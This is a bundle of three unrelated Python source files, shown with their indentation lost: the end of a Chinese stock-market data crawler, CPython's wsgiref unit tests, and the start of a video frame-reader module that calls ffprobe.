process_crawl(SinaCategorySpider, {'category_type': 'sinaIndustry'})
process_crawl(SinaCategorySpider, {'category_type': 'sinaConcept'})
process_crawl(SinaCategorySpider, {'category_type': 'sinaArea'})
def crawl_finance_data(start_code=STOCK_START_CODE, end_code=STOCK_END_CODE):
for _, security_item in get_security_list(start=start_code, end=end_code).iterrows():
try:
# 先抓事件,有些后续抓取依赖事件
process_crawl(StockFinanceReportEventSpider, {"security_item": security_item})
current_report_date = get_report_date()
# 资产负债表
path = get_balance_sheet_path(security_item)
if not os.path.exists(path):
process_crawl(StockFinanceSpider, {"security_item": security_item,
"report_type": "balance_sheet"})
else:
for balance_sheet_item in get_balance_sheet_items(security_item):
# 当前报告期还没抓取
if balance_sheet_item['reportDate'] != current_report_date:
# 报告出来了
df = event.get_finance_report_event(security_item, index='reportDate')
if current_report_date in df.index:
process_crawl(StockFinanceSpider, {"security_item": security_item,
"report_type": "balance_sheet"})
break
# 利润表
path = get_income_statement_path(security_item)
if not os.path.exists(path):
process_crawl(StockFinanceSpider, {"security_item": security_item,
"report_type": "income_statement"})
else:
for balance_sheet_item in get_income_statement_items(security_item):
if balance_sheet_item['reportDate'] != current_report_date:
# 报告出来了
df = event.get_finance_report_event(security_item, index='reportDate')
if current_report_date in df.index:
process_crawl(StockFinanceSpider, {"security_item": security_item,
"report_type": "income_statement"})
break
# 现金流量表
path = get_cash_flow_statement_path(security_item)
if not os.path.exists(path):
process_crawl(StockFinanceSpider, {"security_item": security_item,
"report_type": "cash_flow"})
else:
for balance_sheet_item in get_cash_flow_statement_items(security_item):
if balance_sheet_item['reportDate'] != current_report_date:
# 报告出来了
df = event.get_finance_report_event(security_item, index='reportDate')
if current_report_date in df.index:
process_crawl(StockFinanceSpider, {"security_item": security_item,
"report_type": "cash_flow"})
break
except Exception as e:
logger.error(e)
def crawl_index_quote():
for _, security_item in get_security_list(security_type='index').iterrows():
# 抓取日K线
logger.info("{} get index kdata start".format(security_item['code']))
start_date = get_latest_download_trading_date(security_item, source='163')
end_date = pd.Timestamp.today()
if start_date > end_date:
logger.info("{} kdata is ok".format(security_item['code']))
else:
process_crawl(StockKdataSpider163, {"security_item": security_item,
"start_date": start_date,
"end_date": end_date})
logger.info("{} get index kdata from 163 end".format(security_item['code']))
# 获取市场概况数据[上海,深圳,中小板,创业板]
if security_item['id'] in ['index_sh_000001', 'index_sz_399106', 'index_sz_399005', 'index_sz_399006']:
# if security_item['id'] in ['index_sz_399106', 'index_sz_399005', 'index_sz_399006']:
df = get_kdata(security_item=security_item)
df = df[df['turnoverRate'].isna() | df['tCap'].isna() | df['mCap'].isna() | df[
'pe'].isna()]
if not df.empty:
dates = df.index.strftime('%Y-%m-%d').tolist()
# if security_item['id'] == 'index_sz_399106':
# dates = [the_date for the_date in dates if
# pd.Timestamp(the_date).date().year >= 2018]
if dates:
process_crawl(StockSummarySpider, {"security_item": security_item,
"the_dates": dates})
def crawl_stock_quote(start_code=STOCK_START_CODE, end_code=STOCK_END_CODE, crawl_tick=True):
# 抓取股票k线
for _, security_item in get_security_list(start=start_code, end=end_code).iterrows():
# 抓取日K线
logger.info("{} get stock kdata start".format(security_item['code']))
start_date = get_latest_download_trading_date(security_item, source='163')
end_date = pd.Timestamp.today()
if start_date > end_date:
logger.info("{} stock kdata is ok".format(security_item['code']))
else:
process_crawl(StockKdataSpider163, {"security_item": security_item,
"start_date": start_date,
"end_date": end_date})
logger.info("{} get stock kdata from 163 end".format(security_item['code']))
base_dates = set(get_trading_dates(security_item, source='163'))
for fuquan in ('bfq', 'hfq'):
sina_dates = set(get_trading_dates(security_item, source='sina', fuquan=fuquan))
diff_dates = base_dates - sina_dates
if diff_dates:
logger.info("{} get {} kdata from sina start".format(security_item['code'], fuquan))
process_crawl(StockKDataSpider, {"security_item": security_item,
"trading_dates": diff_dates,
"fuquan": fuquan})
logger.info("{} get {} kdata from sina end".format(security_item['code'], fuquan))
else:
logger.info("{} {} kdata from sina is ok".format(security_item['code'], fuquan))
# 抓取tick
if crawl_tick:
tick_dates = {x for x in base_dates if x >= settings.START_TICK_DATE}
diff_dates = tick_dates - set(get_available_tick_dates(security_item))
if diff_dates:
logger.info("{} get tick start".format(security_item['code']))
process_crawl(StockTickSpider, {"security_item": security_item,
"trading_dates": diff_dates})
logger.info("{} get tick end".format(security_item['code']))
else:
logger.info("{} tick is ok".format(security_item['code']))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--start_code', default='000778', help='the stock start code to be crawled')
parser.add_argument('-e', '--end_code', default='000778', help='the stock end code to be crawled')
args = parser.parse_args()
# crawl_stock_meta()
# crawl_index_quote()
# crawl_stock_quote(args.start_code, args.end_code)
crawl_finance_data(args.start_code, args.end_code)
# crawl_usa_stock_data()
|
test_wsgiref.py
|
from unittest import mock
from test import support
from test.test_httpservers import NoLogRequestHandler
from unittest import TestCase
from wsgiref.util import setup_testing_defaults
from wsgiref.headers import Headers
from wsgiref.handlers import BaseHandler, BaseCGIHandler, SimpleHandler
from wsgiref import util
from wsgiref.validate import validator
from wsgiref.simple_server import WSGIServer, WSGIRequestHandler
from wsgiref.simple_server import make_server
from http.client import HTTPConnection
from io import StringIO, BytesIO, BufferedReader
from socketserver import BaseServer
from platform import python_implementation
import os
import re
import signal
import sys
import threading
import unittest
class MockServer(WSGIServer):
"""Non-socket HTTP server"""
def __init__(self, server_address, RequestHandlerClass):
BaseServer.__init__(self, server_address, RequestHandlerClass)
self.server_bind()
def server_bind(self):
host, port = self.server_address
self.server_name = host
self.server_port = port
self.setup_environ()
class MockHandler(WSGIRequestHandler):
"""Non-socket HTTP handler"""
def setup(self):
self.connection = self.request
self.rfile, self.wfile = self.connection
def finish(self):
pass
def hello_app(environ,start_response):
start_response("200 OK", [
('Content-Type','text/plain'),
('Date','Mon, 05 Jun 2006 18:49:54 GMT')
])
return [b"Hello, world!"]
def header_app(environ, start_response):
start_response("200 OK", [
('Content-Type', 'text/plain'),
('Date', 'Mon, 05 Jun 2006 18:49:54 GMT')
])
return [';'.join([
environ['HTTP_X_TEST_HEADER'], environ['QUERY_STRING'],
environ['PATH_INFO']
]).encode('iso-8859-1')]
def run_amock(app=hello_app, data=b"GET / HTTP/1.0\n\n"):
server = make_server("", 80, app, MockServer, MockHandler)
inp = BufferedReader(BytesIO(data))
out = BytesIO()
olderr = sys.stderr
err = sys.stderr = StringIO()
try:
server.finish_request((inp, out), ("127.0.0.1",8888))
finally:
sys.stderr = olderr
return out.getvalue(), err.getvalue()
def compare_generic_iter(make_it,match):
"""Utility to compare a generic 2.1/2.2+ iterator with an iterable
If running under Python 2.2+, this tests the iterator using iter()/next(),
as well as __getitem__. 'make_it' must be a function returning a fresh
iterator to be tested (since this may test the iterator twice)."""
it = make_it()
n = 0
for item in match:
if not it[n]==item: raise AssertionError
n+=1
try:
it[n]
except IndexError:
pass
else:
raise AssertionError("Too many items from __getitem__",it)
try:
iter, StopIteration
except NameError:
pass
else:
# Only test iter mode under 2.2+
it = make_it()
if not iter(it) is it: raise AssertionError
for item in match:
if not next(it) == item: raise AssertionError
try:
next(it)
except StopIteration:
pass
else:
raise AssertionError("Too many items from .__next__()", it)
class IntegrationTests(TestCase):
def check_hello(self, out, has_length=True):
pyver = (python_implementation() + "/" +
sys.version.split()[0])
self.assertEqual(out,
("HTTP/1.0 200 OK\r\n"
"Server: WSGIServer/0.2 " + pyver +"\r\n"
"Content-Type: text/plain\r\n"
"Date: Mon, 05 Jun 2006 18:49:54 GMT\r\n" +
(has_length and "Content-Length: 13\r\n" or "") +
"\r\n"
"Hello, world!").encode("iso-8859-1")
)
def test_plain_hello(self):
out, err = run_amock()
self.check_hello(out)
def test_environ(self):
request = (
b"GET /p%61th/?query=test HTTP/1.0\n"
b"X-Test-Header: Python test \n"
b"X-Test-Header: Python test 2\n"
b"Content-Length: 0\n\n"
)
out, err = run_amock(header_app, request)
self.assertEqual(
out.splitlines()[-1],
b"Python test,Python test 2;query=test;/path/"
)
def test_request_length(self):
out, err = run_amock(data=b"GET " + (b"x" * 65537) + b" HTTP/1.0\n\n")
self.assertEqual(out.splitlines()[0],
b"HTTP/1.0 414 Request-URI Too Long")
def test_validated_hello(self):
out, err = run_amock(validator(hello_app))
# the middleware doesn't support len(), so content-length isn't there
self.check_hello(out, has_length=False)
def test_simple_validation_error(self):
def bad_app(environ,start_response):
start_response("200 OK", ('Content-Type','text/plain'))
return ["Hello, world!"]
out, err = run_amock(validator(bad_app))
self.assertTrue(out.endswith(
b"A server error occurred. Please contact the administrator."
))
self.assertEqual(
err.splitlines()[-2],
"AssertionError: Headers (('Content-Type', 'text/plain')) must"
" be of type list: <class 'tuple'>"
)
def test_status_validation_errors(self):
def create_bad_app(status):
def bad_app(environ, start_response):
start_response(status, [("Content-Type", "text/plain; charset=utf-8")])
return [b"Hello, world!"]
return bad_app
tests = [
('200', 'AssertionError: Status must be at least 4 characters'),
('20X OK', 'AssertionError: Status message must begin w/3-digit code'),
('200OK', 'AssertionError: Status message must have a space after code'),
]
for status, exc_message in tests:
with self.subTest(status=status):
out, err = run_amock(create_bad_app(status))
self.assertTrue(out.endswith(
b"A server error occurred. Please contact the administrator."
))
self.assertEqual(err.splitlines()[-2], exc_message)
def test_wsgi_input(self):
def bad_app(e,s):
e["wsgi.input"].read()
s("200 OK", [("Content-Type", "text/plain; charset=utf-8")])
return [b"data"]
out, err = run_amock(validator(bad_app))
self.assertTrue(out.endswith(
b"A server error occurred. Please contact the administrator."
))
self.assertEqual(
err.splitlines()[-2], "AssertionError"
)
def test_bytes_validation(self):
def app(e, s):
s("200 OK", [
("Content-Type", "text/plain; charset=utf-8"),
("Date", "Wed, 24 Dec 2008 13:29:32 GMT"),
])
return [b"data"]
out, err = run_amock(validator(app))
self.assertTrue(err.endswith('"GET / HTTP/1.0" 200 4\n'))
ver = sys.version.split()[0].encode('ascii')
py = python_implementation().encode('ascii')
pyver = py + b"/" + ver
self.assertEqual(
b"HTTP/1.0 200 OK\r\n"
b"Server: WSGIServer/0.2 "+ pyver + b"\r\n"
b"Content-Type: text/plain; charset=utf-8\r\n"
b"Date: Wed, 24 Dec 2008 13:29:32 GMT\r\n"
b"\r\n"
b"data",
out)
def test_cp1252_url(self):
def app(e, s):
s("200 OK", [
("Content-Type", "text/plain"),
("Date", "Wed, 24 Dec 2008 13:29:32 GMT"),
])
# PEP3333 says environ variables are decoded as latin1.
# Encode as latin1 to get original bytes
return [e["PATH_INFO"].encode("latin1")]
out, err = run_amock(
validator(app), data=b"GET /\x80%80 HTTP/1.0")
self.assertEqual(
[
b"HTTP/1.0 200 OK",
mock.ANY,
b"Content-Type: text/plain",
b"Date: Wed, 24 Dec 2008 13:29:32 GMT",
b"",
b"/\x80\x80",
],
out.splitlines())
def test_interrupted_write(self):
# BaseHandler._write() and _flush() have to write all data, even if
# it takes multiple send() calls. Test this by interrupting a send()
# call with a Unix signal.
pthread_kill = support.get_attribute(signal, "pthread_kill")
def app(environ, start_response):
start_response("200 OK", [])
return [b'\0' * support.SOCK_MAX_SIZE]
class WsgiHandler(NoLogRequestHandler, WSGIRequestHandler):
pass
server = make_server(support.HOST, 0, app, handler_class=WsgiHandler)
self.addCleanup(server.server_close)
interrupted = threading.Event()
def signal_handler(signum, frame):
interrupted.set()
original = signal.signal(signal.SIGUSR1, signal_handler)
self.addCleanup(signal.signal, signal.SIGUSR1, original)
received = None
main_thread = threading.get_ident()
def run_client():
http = HTTPConnection(*server.server_address)
http.request("GET", "/")
with http.getresponse() as response:
response.read(100)
# The main thread should now be blocking in a send() system
# call. But in theory, it could get interrupted by other
# signals, and then retried. So keep sending the signal in a
# loop, in case an earlier signal happens to be delivered at
# an inconvenient moment.
while True:
pthread_kill(main_thread, signal.SIGUSR1)
if interrupted.wait(timeout=float(1)):
break
nonlocal received
received = len(response.read())
http.close()
background = threading.Thread(target=run_client)
background.start()
server.handle_request()
background.join()
self.assertEqual(received, support.SOCK_MAX_SIZE - 100)
class UtilityTests(TestCase):
def checkShift(self,sn_in,pi_in,part,sn_out,pi_out):
env = {'SCRIPT_NAME':sn_in,'PATH_INFO':pi_in}
util.setup_testing_defaults(env)
self.assertEqual(util.shift_path_info(env),part)
self.assertEqual(env['PATH_INFO'],pi_out)
self.assertEqual(env['SCRIPT_NAME'],sn_out)
return env
def checkDefault(self, key, value, alt=None):
# Check defaulting when empty
env = {}
util.setup_testing_defaults(env)
if isinstance(value, StringIO):
self.assertIsInstance(env[key], StringIO)
elif isinstance(value,BytesIO):
self.assertIsInstance(env[key],BytesIO)
else:
self.assertEqual(env[key], value)
# Check existing value
env = {key:alt}
util.setup_testing_defaults(env)
self.assertIs(env[key], alt)
def checkCrossDefault(self,key,value,**kw):
util.setup_testing_defaults(kw)
self.assertEqual(kw[key],value)
def checkAppURI(self,uri,**kw):
util.setup_testing_defaults(kw)
self.assertEqual(util.application_uri(kw),uri)
def checkReqURI(self,uri,query=1,**kw):
util.setup_testing_defaults(kw)
self.assertEqual(util.request_uri(kw,query),uri)
def checkFW(self,text,size,match):
def make_it(text=text,size=size):
return util.FileWrapper(StringIO(text),size)
compare_generic_iter(make_it,match)
it = make_it()
self.assertFalse(it.filelike.closed)
for item in it:
pass
self.assertFalse(it.filelike.closed)
it.close()
self.assertTrue(it.filelike.closed)
def testSimpleShifts(self):
self.checkShift('','/', '', '/', '')
self.checkShift('','/x', 'x', '/x', '')
self.checkShift('/','', None, '/', '')
self.checkShift('/a','/x/y', 'x', '/a/x', '/y')
self.checkShift('/a','/x/', 'x', '/a/x', '/')
def testNormalizedShifts(self):
self.checkShift('/a/b', '/../y', '..', '/a', '/y')
self.checkShift('', '/../y', '..', '', '/y')
self.checkShift('/a/b', '//y', 'y', '/a/b/y', '')
self.checkShift('/a/b', '//y/', 'y', '/a/b/y', '/')
self.checkShift('/a/b', '/./y', 'y', '/a/b/y', '')
self.checkShift('/a/b', '/./y/', 'y', '/a/b/y', '/')
self.checkShift('/a/b', '///./..//y/.//', '..', '/a', '/y/')
self.checkShift('/a/b', '///', '', '/a/b/', '')
self.checkShift('/a/b', '/.//', '', '/a/b/', '')
self.checkShift('/a/b', '/x//', 'x', '/a/b/x', '/')
self.checkShift('/a/b', '/.', None, '/a/b', '')
def testDefaults(self):
for key, value in [
('SERVER_NAME','127.0.0.1'),
('SERVER_PORT', '80'),
('SERVER_PROTOCOL','HTTP/1.0'),
('HTTP_HOST','127.0.0.1'),
('REQUEST_METHOD','GET'),
('SCRIPT_NAME',''),
('PATH_INFO','/'),
('wsgi.version', (1,0)),
('wsgi.run_once', 0),
('wsgi.multithread', 0),
('wsgi.multiprocess', 0),
('wsgi.input', BytesIO()),
('wsgi.errors', StringIO()),
('wsgi.url_scheme','http'),
]:
self.checkDefault(key,value)
def testCrossDefaults(self):
self.checkCrossDefault('HTTP_HOST',"foo.bar",SERVER_NAME="foo.bar")
self.checkCrossDefault('wsgi.url_scheme',"https",HTTPS="on")
self.checkCrossDefault('wsgi.url_scheme',"https",HTTPS="1")
self.checkCrossDefault('wsgi.url_scheme',"https",HTTPS="yes")
self.checkCrossDefault('wsgi.url_scheme',"http",HTTPS="foo")
self.checkCrossDefault('SERVER_PORT',"80",HTTPS="foo")
self.checkCrossDefault('SERVER_PORT',"443",HTTPS="on")
def testGuessScheme(self):
self.assertEqual(util.guess_scheme({}), "http")
self.assertEqual(util.guess_scheme({'HTTPS':"foo"}), "http")
self.assertEqual(util.guess_scheme({'HTTPS':"on"}), "https")
self.assertEqual(util.guess_scheme({'HTTPS':"yes"}), "https")
self.assertEqual(util.guess_scheme({'HTTPS':"1"}), "https")
def testAppURIs(self):
self.checkAppURI("http://127.0.0.1/")
self.checkAppURI("http://127.0.0.1/spam", SCRIPT_NAME="/spam")
self.checkAppURI("http://127.0.0.1/sp%E4m", SCRIPT_NAME="/sp\xe4m")
self.checkAppURI("http://spam.example.com:2071/",
HTTP_HOST="spam.example.com:2071", SERVER_PORT="2071")
self.checkAppURI("http://spam.example.com/",
SERVER_NAME="spam.example.com")
self.checkAppURI("http://127.0.0.1/",
HTTP_HOST="127.0.0.1", SERVER_NAME="spam.example.com")
self.checkAppURI("https://127.0.0.1/", HTTPS="on")
self.checkAppURI("http://127.0.0.1:8000/", SERVER_PORT="8000",
HTTP_HOST=None)
def testReqURIs(self):
self.checkReqURI("http://127.0.0.1/")
self.checkReqURI("http://127.0.0.1/spam", SCRIPT_NAME="/spam")
self.checkReqURI("http://127.0.0.1/sp%E4m", SCRIPT_NAME="/sp\xe4m")
self.checkReqURI("http://127.0.0.1/spammity/spam",
SCRIPT_NAME="/spammity", PATH_INFO="/spam")
self.checkReqURI("http://127.0.0.1/spammity/sp%E4m",
SCRIPT_NAME="/spammity", PATH_INFO="/sp\xe4m")
self.checkReqURI("http://127.0.0.1/spammity/spam;ham",
SCRIPT_NAME="/spammity", PATH_INFO="/spam;ham")
self.checkReqURI("http://127.0.0.1/spammity/spam;cookie=1234,5678",
SCRIPT_NAME="/spammity", PATH_INFO="/spam;cookie=1234,5678")
self.checkReqURI("http://127.0.0.1/spammity/spam?say=ni",
SCRIPT_NAME="/spammity", PATH_INFO="/spam",QUERY_STRING="say=ni")
self.checkReqURI("http://127.0.0.1/spammity/spam?s%E4y=ni",
SCRIPT_NAME="/spammity", PATH_INFO="/spam",QUERY_STRING="s%E4y=ni")
self.checkReqURI("http://127.0.0.1/spammity/spam", 0,
SCRIPT_NAME="/spammity", PATH_INFO="/spam",QUERY_STRING="say=ni")
def testFileWrapper(self):
self.checkFW("xyz"*50, 120, ["xyz"*40,"xyz"*10])
def testHopByHop(self):
for hop in (
"Connection Keep-Alive Proxy-Authenticate Proxy-Authorization "
"TE Trailers Transfer-Encoding Upgrade"
).split():
for alt in hop, hop.title(), hop.upper(), hop.lower():
self.assertTrue(util.is_hop_by_hop(alt))
# Not comprehensive, just a few random header names
for hop in (
"Accept Cache-Control Date Pragma Trailer Via Warning"
).split():
for alt in hop, hop.title(), hop.upper(), hop.lower():
self.assertFalse(util.is_hop_by_hop(alt))
class HeaderTests(TestCase):
def testMappingInterface(self):
test = [('x','y')]
self.assertEqual(len(Headers()), 0)
self.assertEqual(len(Headers([])),0)
self.assertEqual(len(Headers(test[:])),1)
self.assertEqual(Headers(test[:]).keys(), ['x'])
self.assertEqual(Headers(test[:]).values(), ['y'])
self.assertEqual(Headers(test[:]).items(), test)
self.assertIsNot(Headers(test).items(), test) # must be copy!
h = Headers()
del h['foo'] # should not raise an error
h['Foo'] = 'bar'
for m in h.__contains__, h.get, h.get_all, h.__getitem__:
self.assertTrue(m('foo'))
self.assertTrue(m('Foo'))
self.assertTrue(m('FOO'))
self.assertFalse(m('bar'))
self.assertEqual(h['foo'],'bar')
h['foo'] = 'baz'
self.assertEqual(h['FOO'],'baz')
self.assertEqual(h.get_all('foo'),['baz'])
self.assertEqual(h.get("foo","whee"), "baz")
self.assertEqual(h.get("zoo","whee"), "whee")
self.assertEqual(h.setdefault("foo","whee"), "baz")
self.assertEqual(h.setdefault("zoo","whee"), "whee")
self.assertEqual(h["foo"],"baz")
self.assertEqual(h["zoo"],"whee")
def testRequireList(self):
self.assertRaises(TypeError, Headers, "foo")
def testExtras(self):
h = Headers()
self.assertEqual(str(h),'\r\n')
h.add_header('foo','bar',baz="spam")
self.assertEqual(h['foo'], 'bar; baz="spam"')
self.assertEqual(str(h),'foo: bar; baz="spam"\r\n\r\n')
h.add_header('Foo','bar',cheese=None)
self.assertEqual(h.get_all('foo'),
['bar; baz="spam"', 'bar; cheese'])
self.assertEqual(str(h),
'foo: bar; baz="spam"\r\n'
'Foo: bar; cheese\r\n'
'\r\n'
)
class ErrorHandler(BaseCGIHandler):
"""Simple handler subclass for testing BaseHandler"""
# BaseHandler records the OS environment at import time, but envvars
# might have been changed later by other tests, which trips up
# HandlerTests.testEnviron().
os_environ = dict(os.environ.items())
def __init__(self,**kw):
setup_testing_defaults(kw)
BaseCGIHandler.__init__(
self, BytesIO(), BytesIO(), StringIO(), kw,
multithread=True, multiprocess=True
)
class TestHandler(ErrorHandler):
"""Simple handler subclass for testing BaseHandler, w/error passthru"""
def handle_error(self):
raise # for testing, we want to see what's happening
class HandlerTests(TestCase):
# testEnviron() can produce long error message
maxDiff = 80 * 50
def testEnviron(self):
os_environ = {
# very basic environment
'HOME': '/my/home',
'PATH': '/my/path',
'LANG': 'fr_FR.UTF-8',
# set some WSGI variables
'SCRIPT_NAME': 'test_script_name',
'SERVER_NAME': 'test_server_name',
}
with support.swap_attr(TestHandler, 'os_environ', os_environ):
# override X and HOME variables
handler = TestHandler(X="Y", HOME="/override/home")
handler.setup_environ()
# Check that wsgi_xxx attributes are copied to wsgi.xxx variables
# of handler.environ
for attr in ('version', 'multithread', 'multiprocess', 'run_once',
'file_wrapper'):
self.assertEqual(getattr(handler, 'wsgi_' + attr),
handler.environ['wsgi.' + attr])
# Test handler.environ as a dict
expected = {}
setup_testing_defaults(expected)
# Handler inherits os_environ variables which are not overriden
# by SimpleHandler.add_cgi_vars() (SimpleHandler.base_env)
for key, value in os_environ.items():
if key not in expected:
expected[key] = value
expected.update({
# X doesn't exist in os_environ
"X": "Y",
# HOME is overriden by TestHandler
'HOME': "/override/home",
# overriden by setup_testing_defaults()
"SCRIPT_NAME": "",
"SERVER_NAME": "127.0.0.1",
# set by BaseHandler.setup_environ()
'wsgi.input': handler.get_stdin(),
'wsgi.errors': handler.get_stderr(),
'wsgi.version': (1, 0),
'wsgi.run_once': False,
'wsgi.url_scheme': 'http',
'wsgi.multithread': True,
'wsgi.multiprocess': True,
'wsgi.file_wrapper': util.FileWrapper,
})
self.assertDictEqual(handler.environ, expected)
def testCGIEnviron(self):
h = BaseCGIHandler(None,None,None,{})
h.setup_environ()
for key in 'wsgi.url_scheme', 'wsgi.input', 'wsgi.errors':
self.assertIn(key, h.environ)
def testScheme(self):
h=TestHandler(HTTPS="on"); h.setup_environ()
self.assertEqual(h.environ['wsgi.url_scheme'],'https')
h=TestHandler(); h.setup_environ()
self.assertEqual(h.environ['wsgi.url_scheme'],'http')
def testAbstractMethods(self):
h = BaseHandler()
for name in [
'_flush','get_stdin','get_stderr','add_cgi_vars'
]:
self.assertRaises(NotImplementedError, getattr(h,name))
self.assertRaises(NotImplementedError, h._write, "test")
def testContentLength(self):
# Demo one reason iteration is better than write()... ;)
def trivial_app1(e,s):
s('200 OK',[])
return [e['wsgi.url_scheme'].encode('iso-8859-1')]
def trivial_app2(e,s):
s('200 OK',[])(e['wsgi.url_scheme'].encode('iso-8859-1'))
return []
def trivial_app3(e,s):
s('200 OK',[])
return ['\u0442\u0435\u0441\u0442'.encode("utf-8")]
def trivial_app4(e,s):
# Simulate a response to a HEAD request
s('200 OK',[('Content-Length', '12345')])
return []
h = TestHandler()
h.run(trivial_app1)
self.assertEqual(h.stdout.getvalue(),
("Status: 200 OK\r\n"
"Content-Length: 4\r\n"
"\r\n"
"http").encode("iso-8859-1"))
h = TestHandler()
h.run(trivial_app2)
self.assertEqual(h.stdout.getvalue(),
("Status: 200 OK\r\n"
"\r\n"
"http").encode("iso-8859-1"))
h = TestHandler()
h.run(trivial_app3)
self.assertEqual(h.stdout.getvalue(),
b'Status: 200 OK\r\n'
b'Content-Length: 8\r\n'
b'\r\n'
b'\xd1\x82\xd0\xb5\xd1\x81\xd1\x82')
h = TestHandler()
h.run(trivial_app4)
self.assertEqual(h.stdout.getvalue(),
b'Status: 200 OK\r\n'
b'Content-Length: 12345\r\n'
b'\r\n')
def testBasicErrorOutput(self):
def non_error_app(e,s):
s('200 OK',[])
return []
def error_app(e,s):
raise AssertionError("This should be caught by handler")
h = ErrorHandler()
h.run(non_error_app)
self.assertEqual(h.stdout.getvalue(),
("Status: 200 OK\r\n"
"Content-Length: 0\r\n"
"\r\n").encode("iso-8859-1"))
self.assertEqual(h.stderr.getvalue(),"")
h = ErrorHandler()
h.run(error_app)
self.assertEqual(h.stdout.getvalue(),
("Status: %s\r\n"
"Content-Type: text/plain\r\n"
"Content-Length: %d\r\n"
"\r\n" % (h.error_status,len(h.error_body))).encode('iso-8859-1')
+ h.error_body)
self.assertIn("AssertionError", h.stderr.getvalue())
def testErrorAfterOutput(self):
MSG = b"Some output has been sent"
def error_app(e,s):
s("200 OK",[])(MSG)
raise AssertionError("This should be caught by handler")
h = ErrorHandler()
h.run(error_app)
self.assertEqual(h.stdout.getvalue(),
("Status: 200 OK\r\n"
"\r\n".encode("iso-8859-1")+MSG))
self.assertIn("AssertionError", h.stderr.getvalue())
def testHeaderFormats(self):
def non_error_app(e,s):
s('200 OK',[])
return []
stdpat = (
r"HTTP/%s 200 OK\r\n"
r"Date: \w{3}, [ 0123]\d \w{3} \d{4} \d\d:\d\d:\d\d GMT\r\n"
r"%s" r"Content-Length: 0\r\n" r"\r\n"
)
shortpat = (
"Status: 200 OK\r\n" "Content-Length: 0\r\n" "\r\n"
).encode("iso-8859-1")
for ssw in "FooBar/1.0", None:
sw = ssw and "Server: %s\r\n" % ssw or ""
for version in "1.0", "1.1":
for proto in "HTTP/0.9", "HTTP/1.0", "HTTP/1.1":
h = TestHandler(SERVER_PROTOCOL=proto)
h.origin_server = False
h.http_version = version
h.server_software = ssw
h.run(non_error_app)
self.assertEqual(shortpat,h.stdout.getvalue())
h = TestHandler(SERVER_PROTOCOL=proto)
h.origin_server = True
h.http_version = version
h.server_software = ssw
h.run(non_error_app)
if proto=="HTTP/0.9":
self.assertEqual(h.stdout.getvalue(),b"")
else:
self.assertTrue(
re.match((stdpat%(version,sw)).encode("iso-8859-1"),
h.stdout.getvalue()),
((stdpat%(version,sw)).encode("iso-8859-1"),
h.stdout.getvalue())
)
def testBytesData(self):
def app(e, s):
s("200 OK", [
("Content-Type", "text/plain; charset=utf-8"),
])
return [b"data"]
h = TestHandler()
h.run(app)
self.assertEqual(b"Status: 200 OK\r\n"
b"Content-Type: text/plain; charset=utf-8\r\n"
b"Content-Length: 4\r\n"
b"\r\n"
b"data",
h.stdout.getvalue())
def testCloseOnError(self):
side_effects = {'close_called': False}
MSG = b"Some output has been sent"
def error_app(e,s):
s("200 OK",[])(MSG)
class CrashyIterable(object):
def __iter__(self):
while True:
yield b'blah'
raise AssertionError("This should be caught by handler")
def close(self):
side_effects['close_called'] = True
return CrashyIterable()
h = ErrorHandler()
h.run(error_app)
self.assertEqual(side_effects['close_called'], True)
def testPartialWrite(self):
written = bytearray()
class PartialWriter:
def write(self, b):
partial = b[:7]
written.extend(partial)
return len(partial)
def flush(self):
pass
environ = {"SERVER_PROTOCOL": "HTTP/1.0"}
h = SimpleHandler(BytesIO(), PartialWriter(), sys.stderr, environ)
msg = "should not do partial writes"
with self.assertWarnsRegex(DeprecationWarning, msg):
h.run(hello_app)
self.assertEqual(b"HTTP/1.0 200 OK\r\n"
b"Content-Type: text/plain\r\n"
b"Date: Mon, 05 Jun 2006 18:49:54 GMT\r\n"
b"Content-Length: 13\r\n"
b"\r\n"
b"Hello, world!",
written)
def testClientConnectionTerminations(self):
environ = {"SERVER_PROTOCOL": "HTTP/1.0"}
for exception in (
ConnectionAbortedError,
BrokenPipeError,
ConnectionResetError,
):
with self.subTest(exception=exception):
class AbortingWriter:
def write(self, b):
raise exception
stderr = StringIO()
h = SimpleHandler(BytesIO(), AbortingWriter(), stderr, environ)
h.run(hello_app)
self.assertFalse(stderr.getvalue())
def testDontResetInternalStateOnException(self):
class CustomException(ValueError):
pass
# We are raising CustomException here to trigger an exception
# during the execution of SimpleHandler.finish_response(), so
# we can easily test that the internal state of the handler is
# preserved in case of an exception.
class AbortingWriter:
def write(self, b):
raise CustomException
stderr = StringIO()
environ = {"SERVER_PROTOCOL": "HTTP/1.0"}
h = SimpleHandler(BytesIO(), AbortingWriter(), stderr, environ)
h.run(hello_app)
self.assertIn("CustomException", stderr.getvalue())
# Test that the internal state of the handler is preserved.
self.assertIsNotNone(h.result)
self.assertIsNotNone(h.headers)
self.assertIsNotNone(h.status)
self.assertIsNotNone(h.environ)
if __name__ == "__main__":
unittest.main()
|
framereader.py
|
# pylint: skip-file
import json
import os
import pickle
import queue
import struct
import subprocess
import tempfile
import threading
from functools import wraps
import numpy as np
from aenum import Enum
from lru import LRU
import _io
from tools.lib.cache import cache_path_for_file_path
from tools.lib.exceptions import DataUnreadableError
from tools.lib.file_helpers import atomic_write_in_dir
try:
from xx.chffr.lib.filereader import FileReader
except ImportError:
from tools.lib.filereader import FileReader
HEVC_SLICE_B = 0
HEVC_SLICE_P = 1
HEVC_SLICE_I = 2
class GOPReader:
def get_gop(self, num):
# returns (start_frame_num, num_frames, frames_to_skip, gop_data)
raise NotImplementedError
class DoNothingContextManager:
def __enter__(self):
return self
def __exit__(self, *x):
pass
class FrameType(Enum):
raw = 1
h265_stream = 2
def fingerprint_video(fn):
with FileReader(fn) as f:
header = f.read(4)
if len(header) == 0:
raise DataUnreadableError("%s is empty" % fn)
elif header == b"\x00\xc0\x12\x00":
return FrameType.raw
elif header == b"\x00\x00\x00\x01":
if 'hevc' in fn:
return FrameType.h265_stream
else:
raise NotImplementedError(fn)
else:
raise NotImplementedError(fn)
def ffprobe(fn, fmt=None):
cmd = ["ffprobe",
"-v", "quiet",
"-print_format", "json",
"-show_format", "-show_streams"]
if fmt:
cmd += ["-f", fmt]
cmd += [fn]
try:
ffprobe_output = subprocess.check_output(cmd)
except subprocess.CalledProcessError:
raise DataUnreadableError(fn)
return json.loads(ffprobe_output)
def vidindex(fn, typ):
vidindex_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), "vidindex")
vidindex = os.path.join(vidindex_dir, "vidindex")
subprocess.check_call(["make"], cwd=vidindex_dir, stdout=open("/dev/null", "w"))
